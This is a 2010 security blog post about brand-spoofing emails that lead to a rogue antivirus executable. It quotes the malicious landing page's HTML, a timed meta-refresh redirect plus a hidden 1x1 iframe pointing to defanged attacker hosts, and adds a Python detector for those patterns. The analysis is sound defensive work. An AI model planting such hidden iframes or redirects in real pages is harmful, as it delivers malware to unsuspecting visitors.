Malicious emails lead to rogue AV software antivirus_24.exe
August 7, 2010 2 Comments
MX Lab intercepted emails that lead to rogue antivirus software delivered as the executable antivirus_24.exe. The senders make use of well-known brand names such as Macy’s and Costco Photo Center, and perhaps other brands as well.

The URLs inside the message lead to a web site that hosts a malicious script and, after a short delay, offers you the option to download antivirus_24.exe.
When we followed this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.
The web site has the following HTML code:
PLEASE WAITING 4 SECOND...
<!-- after 4 seconds the browser is sent on to the fake scanner page -->
<meta http-equiv="refresh" content="4; url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head>
<body>
<!-- invisible 1x1 iframe that silently loads a second host -->
<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10" style="visibility: hidden;" height="1" width="1"></iframe>
</body>
</html>
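The landing page relies on two constructs that are easy to flag in HTML pulled from a mail gateway or sandbox: a meta refresh that auto-redirects the visitor, and an iframe hidden by style and sized 1x1. The following inspector is an added example, not MX Lab's own tooling; it uses only the Python standard library, and the sample HTML is a constructed copy of the structure above with placeholder hosts rather than the real ones.

```python
"""Added example (not MX Lab's code): flag the auto-redirect and the hidden
1x1 iframe pattern seen on the rogue AV landing page above."""
import re
from html.parser import HTMLParser

# Constructed sample mirroring the page quoted above; hosts are placeholders.
SAMPLE_HTML = (
    'PLEASE WAITING 4 SECOND... '
    '<meta http-equiv="refresh" content="4; url=hxxp://redirect.example.invalid/scanner/?afid=24">'
    '</head><body> '
    '<iframe src="hxxp://frame.example.invalid:8080/index.php?pid=10" '
    'style="visibility: hidden;" height="1" width="1"></iframe> '
    '</body></html>'
)

# "<seconds>; url=<target>" as used in <meta http-equiv="refresh" content="...">
REFRESH_RE = re.compile(r"^\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)", re.IGNORECASE)


def _tiny(value):
    """True for 0/1-pixel dimensions, the usual size of an invisible frame."""
    if value is None:
        return False
    m = re.match(r"^\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


class LandingPageInspector(HTMLParser):
    """Collects meta-refresh redirects and hidden/tiny iframes while parsing."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases tag and attribute names; valueless attrs are None
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_RE.match(a.get("content", ""))
            if m:
                self.findings.append({"kind": "meta_refresh",
                                      "delay": int(m.group(1)),
                                      "url": m.group(2)})
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = "visibility:hidden" in style or "display:none" in style
            tiny = _tiny(a.get("width")) and _tiny(a.get("height"))
            if hidden or tiny:
                self.findings.append({"kind": "hidden_iframe",
                                      "src": a.get("src", ""),
                                      "hidden_by_style": hidden,
                                      "tiny": tiny})


def inspect_html(html):
    """Return the list of suspicious constructs found in the HTML text."""
    parser = LandingPageInspector()
    parser.feed(html)
    parser.close()
    return parser.findings


def is_suspicious(html):
    """True when the page auto-redirects or loads a hidden frame."""
    kinds = {f["kind"] for f in inspect_html(html)}
    return "hidden_iframe" in kinds or "meta_refresh" in kinds


if __name__ == "__main__":
    for finding in inspect_html(SAMPLE_HTML):
        print(finding)
```

Run over the sample, `inspect_html` reports one `meta_refresh` finding with a 4-second delay and one `hidden_iframe` finding that is both styled invisible and 1x1; a visible, normally sized embed produces no findings. Treat the hits as triage signals for the URL, not as proof on their own, since legitimate pages occasionally use meta refresh.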
We got the screen shown below; on Windows it will look slightly different, with Windows-style icons for your hard drives and so on.

The page then shows a series of errors claiming your system is infected, and the instructions lead you to download the malware. This part is obviously fake, so please do not continue the process.
VirusTotal permalink and MD5: 5be4b708a68687cb5490fe2caea49c82

Just received a similar one purportedly from myspace showing the address:
http://profileedit.myspace.com/index.cfm?fuseaction=accountSettings.cancelAccount
the link actually being to:
http://kidstylesource.com/x.html
I have not followed it though.
Thanks for the URL. We did manage to get a working malicious script that allowed us to make some screenshots and download the malware. Details can be found in our new article “Analysis of rogue anti virus software” http://blog.mxlab.eu/2010/08/20/analysis-of-rogue-anti-virus-software/